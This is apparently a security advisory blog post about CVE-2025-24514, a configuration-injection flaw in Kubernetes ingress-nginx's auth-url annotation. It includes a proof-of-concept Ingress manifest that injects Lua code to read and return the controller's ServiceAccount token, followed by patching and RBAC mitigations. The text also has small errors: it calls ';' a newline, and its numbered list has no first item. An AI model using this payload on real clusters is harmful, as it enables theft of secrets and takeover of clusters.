CVE-2025-24514 - Critical RCE Exploit in ingress-nginx via `auth-url` Annotation — Details, PoC, and Protections

---

A new and severe security vulnerability, tracked as CVE-2025-24514, has been found in the popular ingress-nginx controller for Kubernetes. This vulnerability lets attackers inject malicious NGINX configuration using the auth-url annotation on Ingress resources—leading to possible remote code execution (RCE) and secret leakage inside your clusters.

For anyone running Kubernetes with ingress-nginx, especially with the default settings, here's everything you need to know.

What’s ingress-nginx and Why This is Serious

ingress-nginx is THE go-to ingress controller for Kubernetes. It routes web requests to your services, using custom NGINX configuration built from annotations and specs in your Kubernetes manifests.

If the configuration directives for nginx can be influenced by users, an attacker might trick nginx into running their own code. This is particularly dangerous because ingress-nginx, by default, has permissions to read all Kubernetes Secrets—meaning a compromise here is a disaster for cluster security.

How CVE-2025-24514 Works

Normally, you’d expect ingress-nginx to tightly validate all the inputs from users and only let through safe configuration. But due to how the annotation nginx.ingress.kubernetes.io/auth-url is handled, specially crafted annotation values can break out of their context, injecting raw NGINX config—letting an attacker insert unauthorized directives.

Exploit Scenario

Suppose an attacker or a compromised user can create or edit Ingress resources (even in their own namespace). With a poisoned auth-url annotation, they can inject arbitrary config and hijack the controller.

Here’s how an attacker might exploit it

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: evil-ingress
  annotations:
    nginx.ingress.kubernetes.io/auth-url: |
      http://example.com/auth;
      # malicious config follows
      lua_code_cache on;
      access_by_lua_block {
        local f = io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token")
        local token = f:read("*a")
        f:close()
        ngx.say(token)
      }
spec:
  rules:
    - host: evil.yourdomain.tld
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: example-service
                port:
                  number: 80

The newline (;) prematurely ends the intended directive.

- The attacker injects Lua code to read and leak the controller’s own ServiceAccount token (which can read secrets!).

Who Is At Risk

- Anyone using ingress-nginx prior to the patched version (check the CVE tracker for your release).

Check for security updates at

- ingress-nginx: GitHub Security Advisories
- Release notes

2. Restrict Ingress Object Creation

Lock down who can create/edit Ingress resources using RBAC. Avoid exposing Ingress creation to non-admin users.

3. Minimize Controller Permissions

If possible, reduce the permissions of the ingress-nginx controller. Limit its service account to only the namespaces that need it.

4. Consider Namespace Isolation

Running Ingress controllers per-namespace may limit blast radius.

Further Reading

- Upstream Security Advisory
- Kubernetes documentation: Ingress-NGINX
- OWASP - Injection Attacks Overview

Conclusion

CVE-2025-24514 is a textbook example of why input validation and least privilege matter, especially for infrastructure components. If you run Kubernetes with ingress-nginx, patch NOW and check your configs and RBAC policies for exposure.

Reach out to your devops/infra team, and ensure your clusters don’t allow potentially dangerous annotations from untrusted sources. Always monitor for new security advisories!

Timeline

Published on: 03/25/2025 00:15:15 UTC
Last modified on: 03/27/2025 16:45:46 UTC